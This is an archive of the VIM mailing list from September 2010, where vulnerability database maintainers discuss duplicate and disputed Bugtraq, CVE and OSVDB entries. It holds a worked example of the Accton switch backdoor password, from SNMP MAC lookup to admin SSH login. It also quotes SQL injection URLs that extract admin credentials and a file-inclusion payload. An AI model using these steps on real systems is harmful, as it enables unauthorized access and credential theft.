From teusink at fox-it.com Thu Sep 2 11:20:55 2010 From: teusink at fox-it.com (Niels Teusink) Date: Thu, 2 Sep 2010 18:20:55 +0200 Subject: [VIM] Backdoor password in some Accton-based gigabit switches (3Com, Dell etc.) Message-ID: Hi VIM readers, On the 15th of august 2009, at the HAR2009 conference, the existence of a backdoor password in Accton-based switches was revealed by Edwin Eefting, Erik Smit and Erwin Drent [1][2]. Even though this is a >365-day exploit, it does not seem to be listed in any of the vulnerability databases. Also, I could not find a patch for any of the vulnerable devices. According to the researchers, they contacted 3Com and Accton, but did not receive a response. I have a vulnerable 3Com 3812 in my lab and contacted the 3Com SRT months ago, but did not receive a response either. This seems to be a forgotten bug... The Accton company builds switches, which are rebranded and sold by several manufacturers (including 3Com, Dell, SMC, Foundry and EdgeCore). The researchers list at least the 3Com 3812, 3Com 3870 and Edgecore ES4649 as vulnerable[3], but other vendors are affected as well. For example, I could also reproduce the behavior on a Dell PowerConnect 5224 switch. The backdoor password can be calculated if you have the switch MAC-address, which can be obtained via ARP or SNMP (if you know the community string). It seems to work on all management interfaces: telnet, ssh and http. If you don't know the MAC-address but can guess the OUI, brute forcing the password is probably feasible as well. A perl script (accton.pl) to calculate the password from the MAC address is available at [4]. I'm hoping as a result of this e-mail, this will end up in vulnerability databases, scanners etc. I believe more vulnerable devices will show up as people start scanning their networks. A sample SSH session with my 3Com 3812, running the latest available firmware (2.00): $ snmpget -v1 -c public 192.168.104.99 IF-MIB::ifPhysAddress.1001 IF-MIB::ifPhysAddress.1001 = STRING: 0:d:54:9d:1b:90 $ perl accton.pl 0:d:54:9d:1b:90 !F!RELUO $ ssh __super at 192.168.104.99 __super at 192.168.104.99's password: !F!RELUO Menu options: -------3Com SuperStack 3 Switch 3812 12-port--------------------- bridge - Administer bridge-wide parameters feature - Administer system features gettingStarted - Basic device configuration logout - Logout of the Command Line Interface physicalInterface - Administer physical interfaces protocol - Administer protocols security - Administer security system - Administer system-level functions trafficManagement - Administer traffic management Type ? for help. ------------------------------------- (1)-------------------------------------- Select menu option: Best regards, Niels [1] HAR2009 talk https://har2009.org/program/events/103.en.html [2] HAR2009 slides http://www.vettebak.nl/hak/ [3] Backdoor description http://stuff.zoiah.net/doku.php?id=accton:backdoor [4] Exploit calculator http://www.vettebak.nl/hak/accton.pl From theall at tenable.com Thu Sep 2 21:06:49 2010 From: theall at tenable.com (George A. Theall) Date: Thu, 2 Sep 2010 22:06:49 -0400 Subject: [VIM] CVE / OSVDB id for DB2 APAR Message-ID: <95E7F0D8-06B0-4AC4-9F5D-52FD4FB5DFD5@tenable.com> I was looking through a list of security issues in DB2 that IBM recently patched (http://www-01.ibm.com/support/docview.wss?uid=swg21432298 ) and cross-referencing APARS against CVEs and OSVDBs. I didn't see any mention of the issues IBM labels "SECURITY APAR: MODIFIED SQL DATA table function is not dropped when definer loses required privileges to maintain the objects." (APARs IZ46773, IZ46774, IC63548). All the other issues appear to be covered. Was this missed? George -- theall at tenablesecurity.com From jericho at attrition.org Thu Sep 2 21:11:01 2010 From: jericho at attrition.org (security curmudgeon) Date: Thu, 2 Sep 2010 21:11:01 -0500 (CDT) Subject: [VIM] CVE / OSVDB id for DB2 APAR In-Reply-To: <95E7F0D8-06B0-4AC4-9F5D-52FD4FB5DFD5@tenable.com> References: <95E7F0D8-06B0-4AC4-9F5D-52FD4FB5DFD5@tenable.com> Message-ID: On Thu, 2 Sep 2010, George A. Theall wrote: : I was looking through a list of security issues in DB2 that IBM recently : patched (http://www-01.ibm.com/support/docview.wss?uid=swg21432298) and : cross-referencing APARS against CVEs and OSVDBs. I didn't see any : mention of the issues IBM labels "SECURITY APAR: MODIFIED SQL DATA table : function is not dropped when definer loses required privileges to : maintain the objects." (APARs IZ46773, IZ46774, IC63548). All the other : issues appear to be covered. Was this missed? OSVDB 58477 Despite being "recently patched" in one version of DB2, it goes back to 2009-09-28 for the first time we saw a reference to it. The first two APARs are associated with it, the last was not. I will add it now. Brian From jericho at attrition.org Thu Sep 2 21:12:00 2010 From: jericho at attrition.org (security curmudgeon) Date: Thu, 2 Sep 2010 21:12:00 -0500 (CDT) Subject: [VIM] CVE / OSVDB id for DB2 APAR In-Reply-To: References: <95E7F0D8-06B0-4AC4-9F5D-52FD4FB5DFD5@tenable.com> Message-ID: : : I was looking through a list of security issues in DB2 that IBM recently : : patched (http://www-01.ibm.com/support/docview.wss?uid=swg21432298) and : : cross-referencing APARS against CVEs and OSVDBs. I didn't see any : : mention of the issues IBM labels "SECURITY APAR: MODIFIED SQL DATA table : : function is not dropped when definer loses required privileges to : : maintain the objects." (APARs IZ46773, IZ46774, IC63548). All the other : : issues appear to be covered. Was this missed? : : OSVDB 58477 : : Despite being "recently patched" in one version of DB2, it goes back to : 2009-09-28 for the first time we saw a reference to it. The first two : APARs are associated with it, the last was not. I will add it now. Correction. The first two were associated via reference, the third was added as a keyword (missed in a reference search). Standardizing so it is a reference as well. Brian From theall at tenable.com Mon Sep 6 20:01:01 2010 From: theall at tenable.com (George A. Theall) Date: Mon, 6 Sep 2010 21:01:01 -0400 Subject: [VIM] Blue CMS `X-Forwarded-For' Header SQL Injection Vulnerability Message-ID: Bugtraq 42999 covers a vulnerability based apparently on the advisory published at . The exploit has the string "BlueCMS v1.6 sp1" and involves the script 'comment.php' but doesn't otherwise point to the vendor. SecurityFocus in its BID references , an English company with a couple of different products, one of which is "Blue CMS". While I don't see a download for that product or a demo, so I can't be sure. Still, the product description talks about it using Plone, which makes me wonder if the reference isn't wrong. And indeed, if you search on 'bluecms "v1.6"', one of the top hits uncovered is to http://www.bluecms.net/, a Chinese site, which offers a download for "BlueCMS v1.6 sp1" and seems to require PHP and MySQL. Unfortunately, the download link doesn't work currently. Any thoughts? Rob? George -- theall at tenablesecurity.com From rkeith at securityfocus.com Tue Sep 7 10:54:46 2010 From: rkeith at securityfocus.com (rkeith) Date: Tue, 07 Sep 2010 09:54:46 -0600 Subject: [VIM] Blue CMS `X-Forwarded-For' Header SQL Injection Vulnerability In-Reply-To: References: Message-ID: <4C866046.9060408@securityfocus.com> Hey George, Thanks for noting that, looks like we had the wrong reference. Updating the BID, should be out shortly. -Rob George A. Theall wrote: > Bugtraq 42999 covers a vulnerability based apparently on the advisory > published at . The exploit > has the string "BlueCMS v1.6 sp1" and involves the script 'comment.php' > but doesn't otherwise point to the vendor. > > SecurityFocus in its BID references > , > an English company with a couple of different products, one of which is > "Blue CMS". While I don't see a download for that product or a demo, so > I can't be sure. Still, the product description talks about it using > Plone, which makes me wonder if the reference isn't wrong. > > And indeed, if you search on 'bluecms "v1.6"', one of the top hits > uncovered is to http://www.bluecms.net/, a Chinese site, which offers a > download for "BlueCMS v1.6 sp1" and seems to require PHP and MySQL. > Unfortunately, the download link doesn't work currently. > > Any thoughts? Rob? > > > George -- Rob Keith Symantec From che at secunia.com Wed Sep 8 01:51:10 2010 From: che at secunia.com (Carsten H. Eiram) Date: Wed, 08 Sep 2010 08:51:10 +0200 Subject: [VIM] CVE-2010-3143 vs. CVE-2010-3147 Message-ID: <1283928670.19454.145.camel@ts-hq-1> These two are basically dupes as Windows Address Book and Windows Contacts are two different names for the same file (wab.exe). The file is referenced as "Windows Address Book" in pre-Vista and "Windows Contacts" in Vista and later. -- Med venlig hilsen / Kind regards Carsten H. Eiram Chief Security Specialist Follow us on twitter http://twitter.com/secunia http://twitter.com/carsteneiram Secunia Weidekampsgade 14 A DK-2300 Copenhagen S Denmark Phone +45 7020 5144 Fax +45 7020 5145 From thomas.mackenzie at upsploit.com Thu Sep 9 06:43:56 2010 From: thomas.mackenzie at upsploit.com (Thomas Mackenzie) Date: Thu, 9 Sep 2010 12:43:56 +0100 Subject: [VIM] upSploit released Message-ID: <5B260945-0F0D-4DD3-9F39-BF22407F4D0D@upsploit.com> Hello all, Just a quick message to make you aware that the Public Beta for upSploit has been released at https://www.upsploit.com After 30 mins we had our first advisory uploaded :) Take a look. Thomas Mackenzie From noamr at beyondsecurity.com Thu Sep 9 07:32:37 2010 From: noamr at beyondsecurity.com (Noam Rathaus) Date: Thu, 9 Sep 2010 15:32:37 +0300 Subject: [VIM] upSploit released In-Reply-To: <5B260945-0F0D-4DD3-9F39-BF22407F4D0D@upsploit.com> References: <5B260945-0F0D-4DD3-9F39-BF22407F4D0D@upsploit.com> Message-ID: Hi You need to configure in your webserver the chain certificate of godaddy our your ssl certificate will appear to be invalid Good luck with your idea If you need help let me know On Sep 9, 2010 2:44 PM, "Thomas Mackenzie" wrote: > Hello all, > > Just a quick message to make you aware that the Public Beta for upSploit has been released at https://www.upsploit.com > > After 30 mins we had our first advisory uploaded :) > > Take a look. > > Thomas Mackenzie -------------- next part -------------- An HTML attachment was scrubbed... URL: From theall at tenable.com Fri Sep 10 08:18:36 2010 From: theall at tenable.com (George A. Theall) Date: Fri, 10 Sep 2010 09:18:36 -0400 Subject: [VIM] ES Simple Download 1.0 Local File Inclusion Vulnerability Message-ID: <30E8FF21-9116-48C8-8217-92C0DC472F91@tenable.com> Bugtraq ids 43124 and 43133 both cover a local file include vulnerability in EnergyScripts Simple Download 1.0 involving the 'file' parameter of the 'download.php' script. 43124 uses an exploit that's nearly identical to the one in Exploit DB 14960 while 43133 differs only in the value of 'file'. Both are attributed to Kazza. So, why two BIDs? Rob? George -- theall at tenablesecurity.com From rkeith at securityfocus.com Fri Sep 10 10:12:25 2010 From: rkeith at securityfocus.com (rkeith) Date: Fri, 10 Sep 2010 09:12:25 -0600 Subject: [VIM] ES Simple Download 1.0 Local File Inclusion Vulnerability In-Reply-To: <30E8FF21-9116-48C8-8217-92C0DC472F91@tenable.com> References: <30E8FF21-9116-48C8-8217-92C0DC472F91@tenable.com> Message-ID: <4C8A4AD9.2060408@securityfocus.com> Hey George, Looks like someone didn't see the first when creating the second. We'll have 43133 retired as a duplicate shortly. -Rob George A. Theall wrote: > Bugtraq ids 43124 and 43133 both cover a local file include > vulnerability in EnergyScripts Simple Download 1.0 involving the 'file' > parameter of the 'download.php' script. 43124 uses an exploit that's > nearly identical to the one in Exploit DB 14960 while 43133 differs only > in the value of 'file'. Both are attributed to Kazza. So, why two BIDs? > Rob? > > > > George -- Rob Keith Symantec From thomas.mackenzie at upsploit.com Mon Sep 13 04:20:08 2010 From: thomas.mackenzie at upsploit.com (Thomas Mackenzie) Date: Mon, 13 Sep 2010 10:20:08 +0100 Subject: [VIM] security contact: xerox Message-ID: It is finding impossible to find one and I have rang up multiple times. Does anyone have a security contact for Xerox. Thanks, Tom From jericho at attrition.org Mon Sep 13 16:41:23 2010 From: jericho at attrition.org (security curmudgeon) Date: Mon, 13 Sep 2010 16:41:23 -0500 (CDT) Subject: [VIM] security contact: xerox In-Reply-To: References: Message-ID: : It is finding impossible to find one and I have rang up multiple times. : : Does anyone have a security contact for Xerox. http://www.xerox.com/information-security/enus.html Larry Kovnat, manager of product security at Xerox Security queries: http://www.xerox.com/perl-bin/formeng.pl?form=product_security_information_request_7285 From theall at tenable.com Wed Sep 15 21:12:07 2010 From: theall at tenable.com (George A. Theall) Date: Wed, 15 Sep 2010 22:12:07 -0400 Subject: [VIM] MOAUB #15 - Ipswitch Imail Server List Mailer Reply-To Address Memory Corruption Message-ID: <9C5EA8D9-AF97-4347-9112-0A0F93BC0697@tenable.com> Abyssec published an advisory today concerning a memory corruption issue in Ipswitch Imail that's triggered with multiple long Reply-To headers: http://www.exploit-db.com/moaub-15-ipswitch-imail-server-list-mailer-reply-to-address-memory-corruption/ I see that SecurityFocus has added this as an additional PoC in BID 41717, suggesting it's the same as the issue covered by ZDI-10-126. While the advisories are very similar, I think there are really two distinct issues at play here. That is, ZDI claims the issue has been addressed by iMail 11.02 while Abyssec lists versions 11.01 and 11.02 as affected. And more significantly, Ipswitch themselves have responded already to Abyssec's advisory with a patch: http://kb.imailserver.com/cgi-bin/imail.cfg/php/enduser/std_adp.php?p_faqid=1197 Thoughts? Rob? George -- theall at tenablesecurity.com From rkeith at securityfocus.com Thu Sep 16 12:11:36 2010 From: rkeith at securityfocus.com (rkeith) Date: Thu, 16 Sep 2010 11:11:36 -0600 Subject: [VIM] MOAUB #15 - Ipswitch Imail Server List Mailer Reply-To Address Memory Corruption In-Reply-To: <9C5EA8D9-AF97-4347-9112-0A0F93BC0697@tenable.com> References: <9C5EA8D9-AF97-4347-9112-0A0F93BC0697@tenable.com> Message-ID: <4C924FC8.4050401@securityfocus.com> Hey George, This is an interesting one and you may be correct. Doesn't help that ZDI doesn't disclose a source or any significant details. We'll err on the safe side and create a second BID for this issue. Thanks, Rob George A. Theall wrote: > Abyssec published an advisory today concerning a memory corruption issue > in Ipswitch Imail that's triggered with multiple long Reply-To headers: > > > http://www.exploit-db.com/moaub-15-ipswitch-imail-server-list-mailer-reply-to-address-memory-corruption/ > > > I see that SecurityFocus has added this as an additional PoC in BID > 41717, suggesting it's the same as the issue covered by ZDI-10-126. > While the advisories are very similar, I think there are really two > distinct issues at play here. That is, ZDI claims the issue has been > addressed by iMail 11.02 while Abyssec lists versions 11.01 and 11.02 as > affected. And more significantly, Ipswitch themselves have responded > already to Abyssec's advisory with a patch: > > > http://kb.imailserver.com/cgi-bin/imail.cfg/php/enduser/std_adp.php?p_faqid=1197 > > > Thoughts? Rob? > > George -- Rob Keith Symantec From theall at tenable.com Fri Sep 17 20:57:18 2010 From: theall at tenable.com (George A. Theall) Date: Fri, 17 Sep 2010 21:57:18 -0400 Subject: [VIM] Storyteller CMS (var) Local File Inclusion Vulnerability Message-ID: BorN To K!LL reported a local file inclusion vulnerability in StoryTeller CMS -- covered by Exploit DB 14996 / Bugtraq 43201 -- and offers the following code snippet from 'core.php': function GetTemplate($var) { if (file_exists("templates/$var.tmp.php")) { require("templates/$var.tmp.php"); } else { die ("Error: Can't open template $var"); } return $EST_TEMPLATE; } as well as the following POC: /core.php?var=[Local-File]%00 How's that exploitable? The file only uses '$var' as an argument in various functions. And there's no way I see for an attacker to control input to 'GetTemplate()'. George -- theall at tenablesecurity.com From theall at tenable.com Sat Sep 18 19:15:10 2010 From: theall at tenable.com (George A. Theall) Date: Sat, 18 Sep 2010 20:15:10 -0400 Subject: [VIM] Esvon Classifieds 4.0 Multiple Vulnerabilities Message-ID: <5A943C5B-D6E8-4556-B8C9-F8E7455AEB99@tenable.com> Sn!pEr.S!Te reported some vulnerabilities in Esvon Classifieds 4.0 -- covered by Exploit DB 14817 / Bugtraq 42819 -- that look bogus to me. The first is a command execution issue involving the 'sql' parameter in 'inc/pdo.inc.php'. Looking at the copy of the file attached to the Exploit DB advisory, the file in question comes into play only if the funciton 'mysql_connect' does not exist and the 'PDO' class does, and it consists of a series of function definitions that extend the PDO class, but none that an attacker can reach by calling the file directly. I'm also not sure exactly which code Sn!pEr.S!Te sees as a problem; perhaps: class esPDO extends PDO { var $_aff_rows = 0; function exec($sql){ return $this->_aff_rows = parent::exec($sql); Grep & gripe perhaps? The other issue is a local file inclusion issue in 'inc/ class.phpmailer.php'. The trouble is, that file simply defines a class -- an attacker can't reach any of the functions in it by calling the file directly. And even if you could, the only instances where 'lang_type' come into play is this: function SetLanguage($lang_type, $lang_path = 'language/') { /*if(file_exists($lang_path.'phpmailer.lang-'.$lang_type.'.php')) { include($lang_path.'phpmailer.lang-'.$lang_type.'.php'); } elseif (file_exists($lang_path.'phpmailer.lang-en.php')) { include($lang_path.'phpmailer.lang-en.php'); } else {*/ Note the multiline comment means there's no issue even if you could somehow call that function. George -- theall at tenablesecurity.com From theall at tenable.com Sat Sep 18 20:03:54 2010 From: theall at tenable.com (George A. Theall) Date: Sat, 18 Sep 2010 21:03:54 -0400 Subject: [VIM] Bugtraq IDs 43086 and 43127 Message-ID: <90A6E269-7486-4B46-A8AA-6269AA65D183@tenable.com> What's the difference between Bugtraq ids 43086 and 43127? Both seem to cover the same vulnerability reported over a year ago and covered by EDB-ID 9441. George -- theall at tenablesecurity.com From rkeith at securityfocus.com Mon Sep 20 10:37:22 2010 From: rkeith at securityfocus.com (rkeith) Date: Mon, 20 Sep 2010 09:37:22 -0600 Subject: [VIM] Bugtraq IDs 43086 and 43127 In-Reply-To: <90A6E269-7486-4B46-A8AA-6269AA65D183@tenable.com> References: <90A6E269-7486-4B46-A8AA-6269AA65D183@tenable.com> Message-ID: <4C977FB2.4080808@securityfocus.com> Hey George, We will be retiring 43127 shortly as a duplicate. Thanks, Rob George A. Theall wrote: > What's the difference between Bugtraq ids 43086 and 43127? Both seem to > cover the same vulnerability reported over a year ago and covered by > EDB-ID 9441. > > George From theall at tenable.com Tue Sep 21 12:21:08 2010 From: theall at tenable.com (George A. Theall) Date: Tue, 21 Sep 2010 13:21:08 -0400 Subject: [VIM] Bugtraq IDs 32763 and 42836 Message-ID: It seems like Bugtraq ID 42836 covers one of the vulnerabilities in Max's Guestbook already covered by Bugtraq ID 32763 -- failure to sanitize input to the 'name' parameter. While the newer BID talks about this parameter in "the 'Comment' section", I'm not clear what that is or if it's different from a guestbook message itself. I don't find mention of 'comment' in the PHP code. Nor do I see it in any live sites I've look at. Rob? George -- theall at tenablesecurity.com From theall at tenable.com Tue Sep 21 12:37:47 2010 From: theall at tenable.com (George A. Theall) Date: Tue, 21 Sep 2010 13:37:47 -0400 Subject: [VIM] Bugtraq IDs 42539 and 43257 Message-ID: <29A7E69E-4428-4D3D-8DE3-2D5262F6D3BC@tenable.com> It looks like Bugtraq IDs 42539 and 43257 are covering the same vulnerability -- a SQL injection involving the cid parameter of shop.htm in PPScript. Rob? George -- theall at tenablesecurity.com From rkeith at securityfocus.com Tue Sep 21 12:49:04 2010 From: rkeith at securityfocus.com (rkeith) Date: Tue, 21 Sep 2010 11:49:04 -0600 Subject: [VIM] Bugtraq IDs 42539 and 43257 In-Reply-To: <29A7E69E-4428-4D3D-8DE3-2D5262F6D3BC@tenable.com> References: <29A7E69E-4428-4D3D-8DE3-2D5262F6D3BC@tenable.com> Message-ID: <4C98F010.4030005@securityfocus.com> Hey George, Looks like 43257 has some of the facts incorrect too. We will retire that one shortly as a duplicate. Thanks, Rob George A. Theall wrote: > It looks like Bugtraq IDs 42539 and 43257 are covering the same > vulnerability -- a SQL injection involving the cid parameter of shop.htm > in PPScript. > > Rob? > > > George -- Rob Keith Symantec From rkeith at securityfocus.com Tue Sep 21 13:30:26 2010 From: rkeith at securityfocus.com (rkeith) Date: Tue, 21 Sep 2010 12:30:26 -0600 Subject: [VIM] Bugtraq IDs 32763 and 42836 In-Reply-To: References: Message-ID: <4C98F9C2.6060208@securityfocus.com> I agree, looks like the only 'name' is in a new guestbook entry. We will be retiring 42836 shortly. Thanks again George. -Rob George A. Theall wrote: > It seems like Bugtraq ID 42836 covers one of the vulnerabilities in > Max's Guestbook already covered by Bugtraq ID 32763 -- failure to > sanitize input to the 'name' parameter. > > While the newer BID talks about this parameter in "the 'Comment' > section", I'm not clear what that is or if it's different from a > guestbook message itself. I don't find mention of 'comment' in the PHP > code. Nor do I see it in any live sites I've look at. > > Rob? > > > George From coley at linus.mitre.org Wed Sep 22 12:47:25 2010 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 22 Sep 2010 13:47:25 -0400 (EDT) Subject: [VIM] MOAUB #15 - PHP MicroCMS 1.0.1 Message-ID: Researcher: abysssec.com http://www.exploit-db.com/exploits/15011/ Abysssec claims both username and password are affected, but their source extract of get_account_information() shows that the password is passed into an AES_ENCRYPT function, which presumably prevents SQL syntax from being injected. Yet various VDBs also list the password. Has anybody investigated this further? - Steve From theall at tenable.com Tue Sep 28 10:22:49 2010 From: theall at tenable.com (George A. Theall) Date: Tue, 28 Sep 2010 11:22:49 -0400 Subject: [VIM] Bugtraq IDs 43479 and 43523 Message-ID: What's the difference between Bugtraq IDs 43479 and 43523, Rob? Both seem to have been created yesterday for an issue tracked by CVE-2009-2592 and reported in July 2009. George -- theall at tenablesecurity.com From rkeith at securityfocus.com Tue Sep 28 13:14:42 2010 From: rkeith at securityfocus.com (rkeith) Date: Tue, 28 Sep 2010 12:14:42 -0600 Subject: [VIM] Bugtraq IDs 43479 and 43523 In-Reply-To: References: Message-ID: <4CA23092.2010909@securityfocus.com> No difference, unfortunately. BID 43523 has been retired. -Rob George A. Theall wrote: > What's the difference between Bugtraq IDs 43479 and 43523, Rob? Both > seem to have been created yesterday for an issue tracked by > CVE-2009-2592 and reported in July 2009. > > > George From theall at tenable.com Tue Sep 28 14:38:36 2010 From: theall at tenable.com (George A. Theall) Date: Tue, 28 Sep 2010 15:38:36 -0400 Subject: [VIM] Bugtraq IDs 43479 and 43523 In-Reply-To: <4CA23092.2010909@securityfocus.com> References: <4CA23092.2010909@securityfocus.com> Message-ID: On Sep 28, 2010, at 2:14 PM, rkeith wrote: > No difference, unfortunately. BID 43523 has been retired. Looks like the earlier BID isn't valid either: http://developers.phpjunkyard.com/viewtopic.php?f=7&t=2711 and by extension CVE-2009-2592 / OSVDB 56552. Indeed, looking at the source, I don't see any SQL statements or mention of a 'mes_id' parameter / guestbook.php script. > -Rob > > George A. Theall wrote: >> What's the difference between Bugtraq IDs 43479 and 43523, Rob? Both >> seem to have been created yesterday for an issue tracked by >> CVE-2009-2592 and reported in July 2009. >> >> >> George > George -- theall at tenablesecurity.com From coley at linus.mitre.org Wed Sep 29 10:40:40 2010 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 29 Sep 2010 11:40:40 -0400 (EDT) Subject: [VIM] Oracle CPU advisory URLs changed/broken Message-ID: Looks like all the Oracle CPU advisory URLs got changed without redirecting to their new location. Near as I can tell, we have: http://www.oracle.com/technetwork/topics/security/alerts-086861.html#CriticalPatchUpdates This change breaks approximately 750 URLs in CVE. - Steve From theall at tenable.com Thu Sep 30 11:40:51 2010 From: theall at tenable.com (George A. Theall) Date: Thu, 30 Sep 2010 12:40:51 -0400 Subject: [VIM] Bugtraq Ids 37702 vs 43591 Message-ID: <33BF5074-4B23-42D3-8B45-D3EC700126A9@tenable.com> The newly-created Bugtraq Id 43591 covers a SQL injection in a product named MyPhpAuction -- apparently user-input to the 'id' parameter of the 'product_desc.php' is not sanitized before being used in a database query. SecurityFocus gives as a PoC: http://www.example.com/product_desc.php?id=-5+union+all+select+1,2,concat(admin_name,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_admin-- Notice the "zeeauctions_admin"? Looks like the product is just a rebranded version of that, no? And indeed, if you go to the product page (http://galaxyscriptz.com/products/MyPhpAuction-2010.html), you'll notice the demo links to http://www.canadianelitehosting.com/Demos/ZeeAuctions/ , which appears to be that based on its banner. Given this, the BID seems to be a dup of BID 37702, which gives as a PoC: http://www.example.com/auction/product_desc.php?id=-1/**/union/**/select/**/1,2,concat%28admin_name,0x3a3a3a,pwd%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_adm I'm not clear about the attribution, but this seems to correspond to EDB Id 11047 although it's been truncated (cut-and-paste error?). Taking this into consideration, these two BIDs seem to be duplicates. Rob, did you guys at SecurityFocus look into this at all? George -- theall at tenablesecurity.com From rkeith at securityfocus.com Thu Sep 30 14:49:57 2010 From: rkeith at securityfocus.com (rkeith) Date: Thu, 30 Sep 2010 13:49:57 -0600 Subject: [VIM] Bugtraq Ids 37702 vs 43591 In-Reply-To: <33BF5074-4B23-42D3-8B45-D3EC700126A9@tenable.com> References: <33BF5074-4B23-42D3-8B45-D3EC700126A9@tenable.com> Message-ID: <4CA4E9E5.70807@securityfocus.com> Hey George, We concur with this, and will be retiring 43591 shortly. Cheers, Rob George A. Theall wrote: > The newly-created Bugtraq Id 43591 covers a SQL injection in a product > named MyPhpAuction -- apparently user-input to the 'id' parameter of the > 'product_desc.php' is not sanitized before being used in a database > query. SecurityFocus gives as a PoC: > > > http://www.example.com/product_desc.php?id=-5+union+all+select+1,2,concat(admin_name,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_admin-- > > > Notice the "zeeauctions_admin"? Looks like the product is just a > rebranded version of that, no? And indeed, if you go to the product page > (http://galaxyscriptz.com/products/MyPhpAuction-2010.html), you'll > notice the demo links to > http://www.canadianelitehosting.com/Demos/ZeeAuctions/, which appears to > be that based on its banner. > > Given this, the BID seems to be a dup of BID 37702, which gives as a PoC: > > > http://www.example.com/auction/product_desc.php?id=-1/**/union/**/select/**/1,2,concat%28admin_name,0x3a3a3a,pwd%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_adm > > > I'm not clear about the attribution, but this seems to correspond to EDB > Id 11047 although it's been truncated (cut-and-paste error?). > > Taking this into consideration, these two BIDs seem to be duplicates. > Rob, did you guys at SecurityFocus look into this at all? > > > George